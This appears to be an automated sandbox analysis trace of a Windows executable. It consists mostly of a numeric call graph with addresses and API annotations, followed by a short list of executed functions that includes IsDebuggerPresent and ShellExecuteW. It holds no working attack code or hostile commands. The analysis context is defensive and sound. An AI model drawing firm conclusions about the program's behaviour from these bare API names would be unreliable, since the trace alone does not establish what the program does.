95309->95311 95312 7ff656008e28 wcsftime 37 API calls 95310->95312 95313 7ff65602c14a 95311->95313 95314 7ff655fe5958 95312->95314 95315 7ff655fe5ab4 4 API calls 95313->95315 95314->95296 95316 7ff655fe5960 95314->95316 95318 7ff65602c15b 95315->95318 95317 7ff656008e28 wcsftime 37 API calls 95316->95317 95319 7ff655fe596f 95317->95319 95321 7ff655fee0a8 4 API calls 95318->95321 95319->95299 95320 7ff655fe5977 95319->95320 95322 7ff656008e28 wcsftime 37 API calls 95320->95322 95323 7ff65602c172 95321->95323 95324 7ff655fe5986 95322->95324 95325 7ff655fe5ab4 4 API calls 95323->95325 95326 7ff655fe59c6 95324->95326 95328 7ff655fe5ab4 4 API calls 95324->95328 95327 7ff65602c183 95325->95327 95326->95318 95329 7ff655fe59d3 95326->95329 95330 7ff655fe59a8 95328->95330 95456 7ff655fedf90 95329->95456 95331 7ff655fee0a8 4 API calls 95330->95331 95332 7ff655fe59b5 95331->95332 95335 7ff655fe5ab4 4 API calls 95332->95335 95335->95326 95337 7ff655fed670 5 API calls 95338 7ff655fe5a12 95337->95338 95338->95337 95339 7ff655fe5ab4 4 API calls 95338->95339 95340 7ff655fe5a60 Concurrency::wait 95338->95340 95339->95338 95340->95223 95342 7ff655fe3f29 wcsftime 95341->95342 95343 7ff65602ba2c __scrt_fastfail 95342->95343 95344 7ff655fe3f4b 95342->95344 95347 7ff65602ba4d GetOpenFileNameW 95343->95347 95345 7ff655fe56d4 5 API calls 95344->95345 95346 7ff655fe3f56 95345->95346 95828 7ff655fe3eb4 95346->95828 95349 7ff65602bab0 95347->95349 95350 7ff655fe3858 95347->95350 95352 7ff655fe7cf4 4 API calls 95349->95352 95350->95231 95350->95234 95354 7ff65602babc 95352->95354 95355 7ff655fe3f6c 95846 7ff655fe6394 95355->95846 95358 7ff655fe3fb6 wcsftime 95357->95358 95889 7ff655fe9734 95358->95889 95360 7ff655fe3fc4 95372 7ff655fe4050 95360->95372 95899 7ff655fe4d28 77 API calls 95360->95899 95362 7ff655fe3fd3 95362->95372 95900 7ff655fe4b0c 79 API calls Concurrency::wait 95362->95900 95364 7ff655fe3fe0 95365 7ff655fe3fe8 GetFullPathNameW 95364->95365 95364->95372 95366 7ff655fe7cf4 4 API calls 95365->95366 95367 7ff655fe4014 95366->95367 95368 7ff655fe7cf4 4 API calls 95367->95368 95369 7ff655fe4028 95368->95369 95370 7ff65602bac2 wcscat 95369->95370 95371 7ff655fe7cf4 4 API calls 95369->95371 95371->95372 95372->95234 95904 7ff655fe3d90 7 API calls 95373->95904 95375 7ff655fe38d5 95376 7ff655fe3cbc CreateWindowExW CreateWindowExW ShowWindow ShowWindow 95375->95376 95377->95234 95378->95241 95379->95253 95381 7ff655fe9be5 wcsftime 95380->95381 95382 7ff655fe7cf4 4 API calls 95381->95382 95383 7ff655fe9c1b 95381->95383 95382->95383 95392 7ff655fe9c4a Concurrency::wait 95383->95392 95491 7ff655fe9d84 95383->95491 95385 7ff655feec00 4 API calls 95386 7ff655fe9d4a 95385->95386 95389 7ff655fe4680 4 API calls 95386->95389 95387 7ff655feec00 4 API calls 95387->95392 95388 7ff655fe9d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95388->95392 95390 7ff655fe9d57 Concurrency::wait 95389->95390 95390->95271 95391 7ff655fe4680 4 API calls 95391->95392 95392->95387 95392->95388 95392->95391 95393 7ff655fe9d21 95392->95393 95393->95385 95393->95390 95494 7ff655fe6d64 95394->95494 95397 7ff655fe649d 95399 7ff655fe64c0 95397->95399 95400 7ff655fe64ba FreeLibrary 95397->95400 95398 7ff655fe6d64 2 API calls 95398->95397 95498 7ff6560148e0 95399->95498 95400->95399 95403 7ff65602c8f6 95405 7ff655fe652c 63 API calls 95403->95405 95404 7ff655fe64db LoadLibraryExW 95517 7ff655fe6cc4 95404->95517 95407 7ff65602c8fe 95405->95407 95409 7ff655fe6cc4 3 API calls 95407->95409 95412 7ff65602c907 95409->95412 95411 7ff655fe6505 95411->95412 95413 7ff655fe6512 95411->95413 95539 7ff655fe67d8 95412->95539 95414 7ff655fe652c 63 API calls 95413->95414 95416 7ff655fe5846 95414->95416 95416->95278 95416->95280 95419 7ff65602c93f 95742 7ff655ff1a30 95420->95742 95422 7ff655fef029 95423 7ff655fef040 95422->95423 95424 7ff65603a7a8 95422->95424 95427 7ff656004c68 4 API calls 95423->95427 95757 7ff655feee20 5 API calls Concurrency::wait 95424->95757 95426 7ff65603a7bc 95428 7ff655fef066 95427->95428 95429 7ff655fef0ec 4 API calls 95428->95429 95430 7ff655fef08f 95428->95430 95429->95430 95753 7ff655fef1bc 95430->95753 95432 7ff655fef0c6 95432->95290 95434 7ff655fe5ae4 95433->95434 95435 7ff655fe5ac6 95433->95435 95437 7ff655fe7cf4 4 API calls 95434->95437 95436 7ff655fee0a8 4 API calls 95435->95436 95438 7ff655fe592d 95436->95438 95437->95438 95439 7ff656008e28 95438->95439 95440 7ff656008e3f 95439->95440 95441 7ff656008ea4 95439->95441 95450 7ff656008e63 95440->95450 95759 7ff6560155d4 15 API calls _invalid_parameter_noinfo 95440->95759 95761 7ff656008d98 35 API calls 2 library calls 95441->95761 95444 7ff656008ed6 95447 7ff656008ee2 95444->95447 95454 7ff656008ef9 95444->95454 95445 7ff656008e49 95760 7ff65601b164 31 API calls _invalid_parameter_noinfo 95445->95760 95762 7ff6560155d4 15 API calls _invalid_parameter_noinfo 95447->95762 95448 7ff656008e54 95448->95308 95450->95308 95451 7ff656008ee7 95763 7ff65601b164 31 API calls _invalid_parameter_noinfo 95451->95763 95453 7ff656012c80 37 API calls wcsftime 95453->95454 95454->95453 95455 7ff656008ef2 95454->95455 95455->95308 95457 7ff655fedfac 95456->95457 95458 7ff656004c68 4 API calls 95457->95458 95459 7ff655fe59f5 95457->95459 95458->95459 95460 7ff655fed670 95459->95460 95461 7ff655fed698 95460->95461 95466 7ff655fed6a2 95461->95466 95764 7ff655fe880c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95461->95764 95464 7ff656039d43 95465 7ff655fed7de 95465->95338 95466->95465 95765 7ff655feee20 5 API calls Concurrency::wait 95466->95765 95468 7ff6560629c8 95467->95468 95766 7ff656062b70 95468->95766 95471 7ff655fe67d8 45 API calls 95472 7ff656062a03 95471->95472 95473 7ff655fe67d8 45 API calls 95472->95473 95474 7ff656062a23 95473->95474 95475 7ff655fe67d8 45 API calls 95474->95475 95476 7ff656062a49 95475->95476 95477 7ff655fe67d8 45 API calls 95476->95477 95478 7ff656062a6d 95477->95478 95479 7ff655fe67d8 45 API calls 95478->95479 95480 7ff656062ac5 95479->95480 95481 7ff65606240c 32 API calls 95480->95481 95482 7ff656062ada 95481->95482 95483 7ff6560629de 95482->95483 95771 7ff656061d48 95482->95771 95483->95281 95486 7ff655fe653d 95485->95486 95487 7ff655fe6542 95485->95487 95488 7ff656014970 62 API calls 95486->95488 95489 7ff655fe656f FreeLibrary 95487->95489 95490 7ff655fe6558 95487->95490 95488->95487 95489->95490 95490->95292 95492 7ff655fea7c0 4 API calls 95491->95492 95493 7ff655fe9d99 95492->95493 95493->95383 95495 7ff655fe6d74 LoadLibraryA 95494->95495 95496 7ff655fe6490 95494->95496 95495->95496 95497 7ff655fe6d89 GetProcAddress 95495->95497 95496->95397 95496->95398 95497->95496 95499 7ff6560147fc 95498->95499 95500 7ff65601482a 95499->95500 95503 7ff65601485c 95499->95503 95559 7ff6560155d4 15 API calls _invalid_parameter_noinfo 95500->95559 95502 7ff65601482f 95560 7ff65601b164 31 API calls _invalid_parameter_noinfo 95502->95560 95505 7ff65601486f 95503->95505 95506 7ff656014862 95503->95506 95547 7ff65601feb4 95505->95547 95561 7ff6560155d4 15 API calls _invalid_parameter_noinfo 95506->95561 95509 7ff655fe64cf 95509->95403 95509->95404 95511 7ff656014890 95554 7ff656020304 95511->95554 95512 7ff656014883 95562 7ff6560155d4 15 API calls _invalid_parameter_noinfo 95512->95562 95515 7ff6560148a3 95563 7ff65600df60 LeaveCriticalSection 95515->95563 95701 7ff655fe6d1c 95517->95701 95520 7ff655fe6cf1 95522 7ff655fe64f7 95520->95522 95523 7ff655fe6d0f FreeLibrary 95520->95523 95521 7ff655fe6d1c 2 API calls 95521->95520 95524 7ff655fe6580 95522->95524 95523->95522 95525 7ff656004c68 4 API calls 95524->95525 95526 7ff655fe65b5 memcpy_s 95525->95526 95527 7ff655fe6740 CreateStreamOnHGlobal 95526->95527 95528 7ff65602c9f5 95526->95528 95538 7ff655fe6602 95526->95538 95529 7ff655fe6759 FindResourceExW 95527->95529 95527->95538 95705 7ff656062e00 45 API calls 95528->95705 95529->95538 95531 7ff65602c97e LoadResource 95532 7ff65602c997 SizeofResource 95531->95532 95531->95538 95535 7ff65602c9ae LockResource 95532->95535 95532->95538 95533 7ff655fe67d8 45 API calls 95533->95538 95534 7ff65602c9fd 95536 7ff655fe67d8 45 API calls 95534->95536 95535->95538 95537 7ff655fe66e8 95536->95537 95537->95411 95538->95531 95538->95533 95538->95534 95538->95537 95540 7ff65602ca6c 95539->95540 95541 7ff655fe67f7 95539->95541 95706 7ff656014c5c 95541->95706 95544 7ff65606240c 95725 7ff656062200 95544->95725 95546 7ff656062430 95546->95419 95564 7ff65601b9bc EnterCriticalSection 95547->95564 95549 7ff65601fecb 95550 7ff65601ff54 18 API calls 95549->95550 95551 7ff65601fed6 95550->95551 95552 7ff65601ba10 _isindst LeaveCriticalSection 95551->95552 95553 7ff656014879 95552->95553 95553->95511 95553->95512 95565 7ff656020040 95554->95565 95558 7ff65602035e 95558->95515 95559->95502 95560->95509 95561->95509 95562->95509 95570 7ff65602007d try_get_function 95565->95570 95567 7ff6560202de 95584 7ff65601b164 31 API calls _invalid_parameter_noinfo 95567->95584 95569 7ff65602021a 95569->95558 95577 7ff656027738 95569->95577 95576 7ff656020211 95570->95576 95580 7ff65600db68 37 API calls 4 library calls 95570->95580 95572 7ff656020277 95572->95576 95581 7ff65600db68 37 API calls 4 library calls 95572->95581 95574 7ff65602029a 95574->95576 95582 7ff65600db68 37 API calls 4 library calls 95574->95582 95576->95569 95583 7ff6560155d4 15 API calls _invalid_parameter_noinfo 95576->95583 95585 7ff656026d04 95577->95585 95580->95572 95581->95574 95582->95576 95583->95567 95584->95569 95586 7ff656026d28 95585->95586 95587 7ff656026d40 95585->95587 95639 7ff6560155d4 15 API calls _invalid_parameter_noinfo 95586->95639 95587->95586 95590 7ff656026d6d 95587->95590 95589 7ff656026d2d 95640 7ff65601b164 31 API calls _invalid_parameter_noinfo 95589->95640 95596 7ff656027348 95590->95596 95594 7ff656026d39 95594->95558 95642 7ff656027078 95596->95642 95599 7ff6560273bc 95674 7ff6560155b4 15 API calls _invalid_parameter_noinfo 95599->95674 95600 7ff6560273d3 95662 7ff65601e418 95600->95662 95604 7ff6560273c1 95675 7ff6560155d4 15 API calls _invalid_parameter_noinfo 95604->95675 95605 7ff6560273f7 CreateFileW 95608 7ff656027469 95605->95608 95609 7ff6560274eb GetFileType 95605->95609 95606 7ff6560273df 95676 7ff6560155b4 15 API calls _invalid_parameter_noinfo 95606->95676 95612 7ff6560274b8 GetLastError 95608->95612 95618 7ff656027478 CreateFileW 95608->95618 95614 7ff656027549 95609->95614 95615 7ff6560274f8 GetLastError 95609->95615 95611 7ff6560273e4 95677 7ff6560155d4 15 API calls _invalid_parameter_noinfo 95611->95677 95678 7ff656015564 15 API calls 2 library calls 95612->95678 95613 7ff656026d95 95613->95594 95641 7ff65601e3f4 LeaveCriticalSection 95613->95641 95681 7ff65601e334 16 API calls 2 library calls 95614->95681 95679 7ff656015564 15 API calls 2 library calls 95615->95679 95618->95609 95618->95612 95620 7ff656027507 CloseHandle 95620->95604 95621 7ff656027539 95620->95621 95680 7ff6560155d4 15 API calls _invalid_parameter_noinfo 95621->95680 95624 7ff656027568 95626 7ff6560275b5 95624->95626 95682 7ff656027284 67 API calls 2 library calls 95624->95682 95625 7ff65602753e 95625->95604 95630 7ff6560275ec 95626->95630 95683 7ff656026de4 67 API calls 4 library calls 95626->95683 95629 7ff6560275e8 95629->95630 95631 7ff6560275fe 95629->95631 95684 7ff6560204b8 95630->95684 95631->95613 95633 7ff656027681 CloseHandle CreateFileW 95631->95633 95634 7ff6560276cb GetLastError 95633->95634 95635 7ff6560276f9 95633->95635 95699 7ff656015564 15 API calls 2 library calls 95634->95699 95635->95613 95637 7ff6560276d8 95700 7ff65601e548 16 API calls 2 library calls 95637->95700 95639->95589 95640->95594 95643 7ff6560270a4 95642->95643 95650 7ff6560270be 95642->95650 95644 7ff6560155d4 _get_daylight 15 API calls 95643->95644 95643->95650 95645 7ff6560270b3 95644->95645 95646 7ff65601b164 _invalid_parameter_noinfo 31 API calls 95645->95646 95646->95650 95647 7ff65602718c 95651 7ff656012554 31 API calls 95647->95651 95660 7ff6560271ec 95647->95660 95648 7ff65602713b 95648->95647 95649 7ff6560155d4 _get_daylight 15 API calls 95648->95649 95652 7ff656027181 95649->95652 95650->95648 95653 7ff6560155d4 _get_daylight 15 API calls 95650->95653 95654 7ff6560271e8 95651->95654 95656 7ff65601b164 _invalid_parameter_noinfo 31 API calls 95652->95656 95657 7ff656027130 95653->95657 95655 7ff65602726b 95654->95655 95654->95660 95658 7ff65601b184 _isindst 16 API calls 95655->95658 95656->95647 95659 7ff65601b164 _invalid_parameter_noinfo 31 API calls 95657->95659 95661 7ff656027280 95658->95661 95659->95648 95660->95599 95660->95600 95663 7ff65601b9bc _isindst EnterCriticalSection 95662->95663 95669 7ff65601e43b 95663->95669 95664 7ff65601e464 95666 7ff65601e170 16 API calls 95664->95666 95665 7ff65601ba10 _isindst LeaveCriticalSection 95667 7ff65601e52a 95665->95667 95668 7ff65601e469 95666->95668 95667->95605 95667->95606 95672 7ff65601e310 fwprintf EnterCriticalSection 95668->95672 95673 7ff65601e487 95668->95673 95669->95664 95670 7ff65601e4c2 EnterCriticalSection 95669->95670 95669->95673 95671 7ff65601e4d1 LeaveCriticalSection 95670->95671 95670->95673 95671->95669 95672->95673 95673->95665 95674->95604 95675->95613 95676->95611 95677->95604 95678->95604 95679->95620 95680->95625 95681->95624 95682->95626 95683->95629 95685 7ff65601e604 31 API calls 95684->95685 95688 7ff6560204cc 95685->95688 95686 7ff6560204d2 95687 7ff65601e548 16 API calls 95686->95687 95689 7ff656020534 95687->95689 95688->95686 95690 7ff65601e604 31 API calls 95688->95690 95698 7ff65602050c 95688->95698 95692 7ff656020560 95689->95692 95695 7ff656015564 fread_s 15 API calls 95689->95695 95693 7ff6560204ff 95690->95693 95691 7ff65601e604 31 API calls 95694 7ff656020518 CloseHandle 95691->95694 95692->95613 95696 7ff65601e604 31 API calls 95693->95696 95694->95686 95697 7ff656020525 GetLastError 95694->95697 95695->95692 95696->95698 95697->95686 95698->95686 95698->95691 95699->95637 95700->95635 95702 7ff655fe6ce3 95701->95702 95703 7ff655fe6d2c LoadLibraryA 95701->95703 95702->95520 95702->95521 95703->95702 95704 7ff655fe6d41 GetProcAddress 95703->95704 95704->95702 95705->95534 95709 7ff656014c7c 95706->95709 95710 7ff656014ca6 95709->95710 95721 7ff655fe680a 95709->95721 95711 7ff656014cd7 95710->95711 95712 7ff656014cb5 __scrt_fastfail 95710->95712 95710->95721 95724 7ff65600df54 EnterCriticalSection 95711->95724 95722 7ff6560155d4 15 API calls _invalid_parameter_noinfo 95712->95722 95717 7ff656014cca 95723 7ff65601b164 31 API calls _invalid_parameter_noinfo 95717->95723 95721->95544 95722->95717 95723->95721 95728 7ff6560147bc 95725->95728 95727 7ff656062210 95727->95546 95731 7ff656014724 95728->95731 95732 7ff656014746 95731->95732 95733 7ff656014732 95731->95733 95738 7ff656014742 95732->95738 95741 7ff65601bef8 6 API calls __crtLCMapStringW 95732->95741 95739 7ff6560155d4 15 API calls _invalid_parameter_noinfo 95733->95739 95735 7ff656014737 95740 7ff65601b164 31 API calls _invalid_parameter_noinfo 95735->95740 95738->95727 95739->95735 95740->95738 95741->95738 95743 7ff655ff1c5f 95742->95743 95744 7ff655ff1a48 95742->95744 95743->95422 95749 7ff655ff1a90 95744->95749 95758 7ff656005114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95744->95758 95749->95422 95754 7ff655fef1ce 95753->95754 95756 7ff655fef1d8 95753->95756 95755 7ff655ff1a30 45 API calls 95754->95755 95755->95756 95756->95432 95757->95426 95759->95445 95760->95448 95761->95444 95762->95451 95763->95455 95764->95466 95765->95464 95768 7ff656062bae 95766->95768 95767 7ff65606240c 32 API calls 95767->95768 95768->95767 95769 7ff6560629da 95768->95769 95770 7ff655fe67d8 45 API calls 95768->95770 95769->95471 95769->95483 95770->95768 95772 7ff656061d71 95771->95772 95773 7ff656061d61 95771->95773 95775 7ff656061dbf 95772->95775 95776 7ff6560148e0 89 API calls 95772->95776 95777 7ff656061d7a 95772->95777 95774 7ff6560148e0 89 API calls 95773->95774 95774->95772 95798 7ff656062038 95775->95798 95778 7ff656061d9e 95776->95778 95777->95483 95778->95775 95780 7ff656061da7 95778->95780 95780->95777 95810 7ff656014970 95780->95810 95781 7ff656061df5 95782 7ff656061e1c 95781->95782 95783 7ff656061df9 95781->95783 95788 7ff656061e4a 95782->95788 95789 7ff656061e2a 95782->95789 95785 7ff656061e07 95783->95785 95786 7ff656014970 62 API calls 95783->95786 95785->95777 95787 7ff656014970 62 API calls 95785->95787 95786->95785 95787->95777 95802 7ff656061e88 95788->95802 95790 7ff656061e38 95789->95790 95792 7ff656014970 62 API calls 95789->95792 95790->95777 95793 7ff656014970 62 API calls 95790->95793 95792->95790 95793->95777 95794 7ff656061e68 95794->95777 95797 7ff656014970 62 API calls 95794->95797 95795 7ff656061e52 95795->95794 95796 7ff656014970 62 API calls 95795->95796 95796->95794 95797->95777 95799 7ff656062056 memcpy_s 95798->95799 95800 7ff656062069 95798->95800 95799->95781 95801 7ff656014c5c _fread_nolock 45 API calls 95800->95801 95801->95799 95803 7ff656061fb0 95802->95803 95809 7ff656061eaa 95802->95809 95806 7ff656061fd3 95803->95806 95824 7ff656012a04 60 API calls 2 library calls 95803->95824 95804 7ff656061bd0 45 API calls 95804->95809 95806->95795 95809->95803 95809->95804 95809->95806 95822 7ff656061c9c 45 API calls 95809->95822 95823 7ff6560620cc 60 API calls 95809->95823 95811 7ff65601498e 95810->95811 95812 7ff6560149a3 95810->95812 95826 7ff6560155d4 15 API calls _invalid_parameter_noinfo 95811->95826 95818 7ff65601499e 95812->95818 95825 7ff65600df54 EnterCriticalSection 95812->95825 95815 7ff656014993 95827 7ff65601b164 31 API calls _invalid_parameter_noinfo 95815->95827 95816 7ff6560149b9 95819 7ff6560148ec 60 API calls 95816->95819 95818->95777 95820 7ff6560149c2 95819->95820 95821 7ff65600df60 fflush LeaveCriticalSection 95820->95821 95821->95818 95822->95809 95823->95809 95824->95806 95826->95815 95827->95818 95829 7ff656028f90 wcsftime 95828->95829 95830 7ff655fe3ec4 GetLongPathNameW 95829->95830 95831 7ff655fe7cf4 4 API calls 95830->95831 95832 7ff655fe3eed 95831->95832 95833 7ff655fe4074 95832->95833 95834 7ff655fe9640 4 API calls 95833->95834 95835 7ff655fe408e 95834->95835 95836 7ff655fe56d4 5 API calls 95835->95836 95837 7ff655fe409b 95836->95837 95838 7ff65602bada 95837->95838 95839 7ff655fe40a7 95837->95839 95844 7ff65602bb0f 95838->95844 95880 7ff656001ad0 CompareStringW 95838->95880 95841 7ff655fe4680 4 API calls 95839->95841 95842 7ff655fe40b5 95841->95842 95876 7ff655fe40e8 95842->95876 95845 7ff655fe40cb Concurrency::wait 95845->95355 95847 7ff655fe6460 105 API calls 95846->95847 95848 7ff655fe63e5 95847->95848 95849 7ff65602c656 95848->95849 95850 7ff655fe6460 105 API calls 95848->95850 95851 7ff656062948 90 API calls 95849->95851 95852 7ff655fe6400 95850->95852 95853 7ff65602c66e 95851->95853 95852->95849 95854 7ff655fe6408 95852->95854 95855 7ff65602c690 95853->95855 95856 7ff65602c672 95853->95856 95858 7ff655fe6414 95854->95858 95859 7ff65602c67b 95854->95859 95857 7ff656004c68 4 API calls 95855->95857 95860 7ff655fe652c 63 API calls 95856->95860 95875 7ff65602c6dd Concurrency::wait 95857->95875 95881 7ff655fee774 143 API calls Concurrency::wait 95858->95881 95882 7ff65605c5c8 77 API calls wprintf 95859->95882 95860->95859 95863 7ff65602c68a 95863->95855 95864 7ff655fe6438 95864->95350 95865 7ff65602c895 95866 7ff655fe652c 63 API calls 95865->95866 95874 7ff65602c8a9 95866->95874 95871 7ff655feec00 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95871->95875 95874->95865 95888 7ff6560576d8 77 API calls 3 library calls 95874->95888 95875->95865 95875->95871 95875->95874 95883 7ff656057400 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95875->95883 95884 7ff65605730c 39 API calls 95875->95884 95885 7ff656060210 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95875->95885 95886 7ff655feb26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95875->95886 95887 7ff655fe9940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95875->95887 95877 7ff655fe4107 95876->95877 95879 7ff655fe4130 memcpy_s 95876->95879 95878 7ff656004c68 4 API calls 95877->95878 95878->95879 95879->95845 95880->95838 95881->95864 95882->95863 95883->95875 95884->95875 95885->95875 95886->95875 95887->95875 95888->95874 95890 7ff655fe9762 95889->95890 95891 7ff655fe988d 95889->95891 95890->95891 95892 7ff656004c68 4 API calls 95890->95892 95891->95360 95894 7ff655fe9791 95892->95894 95893 7ff656004c68 4 API calls 95898 7ff655fe981c 95893->95898 95894->95893 95898->95891 95901 7ff655feabe0 81 API calls 2 library calls 95898->95901 95902 7ff655fe9940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95898->95902 95903 7ff655feb26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95898->95903 95899->95362 95900->95364 95901->95898 95902->95898 95903->95898 95904->95375 95905 7ff65603e263 95906 7ff65603e271 95905->95906 95916 7ff655ff2680 95905->95916 95906->95906 95907 7ff655ff29c8 PeekMessageW 95907->95916 95908 7ff655ff26da GetInputState 95908->95907 95908->95916 95910 7ff65603d181 TranslateAcceleratorW 95910->95916 95911 7ff655ff2a33 PeekMessageW 95911->95916 95912 7ff655ff2a1f TranslateMessage DispatchMessageW 95912->95911 95913 7ff655ff28b9 timeGetTime 95913->95916 95914 7ff65603d2bb timeGetTime 95938 7ff656002ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95914->95938 95916->95907 95916->95908 95916->95910 95916->95911 95916->95912 95916->95913 95916->95914 95920 7ff655ff66c0 301 API calls 95916->95920 95921 7ff655ff2856 95916->95921 95922 7ff655ff3c20 301 API calls 95916->95922 95923 7ff6560634e4 77 API calls 95916->95923 95925 7ff655ff2b70 95916->95925 95932 7ff656002de8 95916->95932 95937 7ff655ff2e30 301 API calls 2 library calls 95916->95937 95939 7ff656063a28 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95916->95939 95940 7ff65607a320 301 API calls Concurrency::wait 95916->95940 95920->95916 95922->95916 95923->95916 95926 7ff655ff2b96 95925->95926 95928 7ff655ff2ba9 95925->95928 95941 7ff655ff2050 95926->95941 95961 7ff6560634e4 77 API calls 3 library calls 95928->95961 95929 7ff655ff2b9e 95929->95916 95931 7ff65603e55c 95933 7ff656002e0d 95932->95933 95934 7ff656002e2a 95932->95934 95933->95916 95934->95933 95935 7ff656002e5b IsDialogMessageW 95934->95935 95936 7ff656049d94 GetClassLongPtrW 95934->95936 95935->95933 95935->95934 95936->95934 95936->95935 95937->95916 95938->95916 95939->95916 95940->95916 95942 7ff655ff3c20 301 API calls 95941->95942 95954 7ff655ff20a8 95942->95954 95943 7ff655ff212d 95943->95929 95944 7ff65603d06f 95966 7ff6560634e4 77 API calls 3 library calls 95944->95966 95946 7ff65603d08d 95947 7ff655ff2552 95949 7ff656004c68 4 API calls 95947->95949 95948 7ff65603d036 95964 7ff655feee20 5 API calls Concurrency::wait 95948->95964 95956 7ff655ff23cb memcpy_s 95949->95956 95951 7ff656004c68 4 API calls 95958 7ff655ff22a5 memcpy_s 95951->95958 95952 7ff655ff2244 95952->95956 95962 7ff655ff1ce4 302 API calls Concurrency::wait 95952->95962 95953 7ff65603d062 95965 7ff655feee20 5 API calls Concurrency::wait 95953->95965 95954->95943 95954->95944 95954->95947 95954->95952 95954->95956 95954->95958 95956->95948 95959 7ff6560634e4 77 API calls 95956->95959 95963 7ff655fe4a60 301 API calls 95956->95963 95958->95951 95958->95956 95959->95956 95961->95931 95962->95958 95963->95956 95964->95953 95965->95944 95966->95946 95967 7ff655ff2c17 95970 7ff655ff14a0 95967->95970 95969 7ff655ff2c2a 95971 7ff655ff14d3 95970->95971 95972 7ff65603be31 95971->95972 95974 7ff65603bdd1 95971->95974 95975 7ff65603bdf2 95971->95975 95987 7ff655ff14fa __scrt_fastfail 95971->95987 96017 7ff656078f48 301 API calls 3 library calls 95972->96017 95977 7ff65603bddb 95974->95977 95974->95987 95978 7ff65603be19 95975->95978 96015 7ff656079a88 301 API calls 4 library calls 95975->96015 96014 7ff656079514 301 API calls 95977->96014 96016 7ff6560634e4 77 API calls 3 library calls 95978->96016 95985 7ff655ff1a30 45 API calls 95985->95987 95986 7ff655ff1898 95986->95969 95987->95985 95988 7ff656004f0c __scrt_initialize_thread_safe_statics 34 API calls 95987->95988 95990 7ff656002130 45 API calls 95987->95990 95992 7ff655ff1884 95987->95992 95996 7ff655ff1815 95987->95996 95997 7ff65603bfe4 95987->95997 96000 7ff655ff3c20 301 API calls 95987->96000 96001 7ff655fee0a8 4 API calls 95987->96001 96004 7ff655ff1799 95987->96004 96005 7ff655feef9c 46 API calls 95987->96005 96007 7ff6560020d0 45 API calls 95987->96007 96008 7ff655fe5af8 301 API calls 95987->96008 96009 7ff656005114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95987->96009 96010 7ff6560035c8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95987->96010 96011 7ff6560050b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95987->96011 96012 7ff6560036c4 77 API calls 95987->96012 96013 7ff6560037dc 301 API calls 95987->96013 96018 7ff655feee20 5 API calls Concurrency::wait 95987->96018 96019 7ff65604ac10 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95987->96019 95988->95987 95990->95987 96006 7ff656002130 45 API calls 95992->96006 95996->95969 96020 7ff6560793a4 77 API calls 95997->96020 96000->95987 96001->95987 96004->95996 96021 7ff6560634e4 77 API calls 3 library calls 96004->96021 96005->95987 96006->95986 96007->95987 96008->95987 96010->95987 96012->95987 96013->95987 96014->95996 96015->95978 96016->95972 96017->95987 96018->95987 96019->95987 96020->96004 96021->96004 96022 7ff65601a2c4 96023 7ff65601a2dd 96022->96023 96030 7ff65601a2d9 96022->96030 96032 7ff656023e9c GetEnvironmentStringsW 96023->96032 96026 7ff65601a2ea 96028 7ff65601b3c0 __free_lconv_num 15 API calls 96026->96028 96028->96030 96029 7ff65601a2f7 96031 7ff65601b3c0 __free_lconv_num 15 API calls 96029->96031 96031->96026 96033 7ff65601a2e2 96032->96033 96035 7ff656023ec0 96032->96035 96033->96026 96039 7ff65601a428 31 API calls 3 library calls 96033->96039 96040 7ff65601c51c 96035->96040 96036 7ff656023ef2 memcpy_s 96037 7ff65601b3c0 __free_lconv_num 15 API calls 96036->96037 96038 7ff656023f12 FreeEnvironmentStringsW 96037->96038 96038->96033 96039->96029 96041 7ff65601c567 96040->96041 96042 7ff65601c52b fread_s 96040->96042 96048 7ff6560155d4 15 API calls _invalid_parameter_noinfo 96041->96048 96042->96041 96044 7ff65601c54e HeapAlloc 96042->96044 96047 7ff65600925c EnterCriticalSection LeaveCriticalSection fread_s 96042->96047 96044->96042 96045 7ff65601c565 96044->96045 96045->96036 96047->96042 96048->96045

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FF655FE37B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 145windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF655FE3785), ref: 00007FF655FE37F2
                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF655FE3785), ref: 00007FF655FE3807
                                                                                                                    • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF655FE3785), ref: 00007FF655FE388D
                                                                                                                      • Part of subcall function 00007FF655FE3F9C: GetFullPathNameW.KERNEL32(D000000000000000,00007FF655FE38BF,?,?,?,?,?,00007FF655FE3785), ref: 00007FF655FE3FFD
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF655FE3785), ref: 00007FF655FE3924
                                                                                                                    • MessageBoxA.USER32 ref: 00007FF65602B888
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF655FE3785), ref: 00007FF65602B8E1
                                                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,00007FF655FE3785), ref: 00007FF65602B968
                                                                                                                    • ShellExecuteW.SHELL32 ref: 00007FF65602B98F
                                                                                                                      • Part of subcall function 00007FF655FE3B84: GetSysColorBrush.USER32 ref: 00007FF655FE3B9E
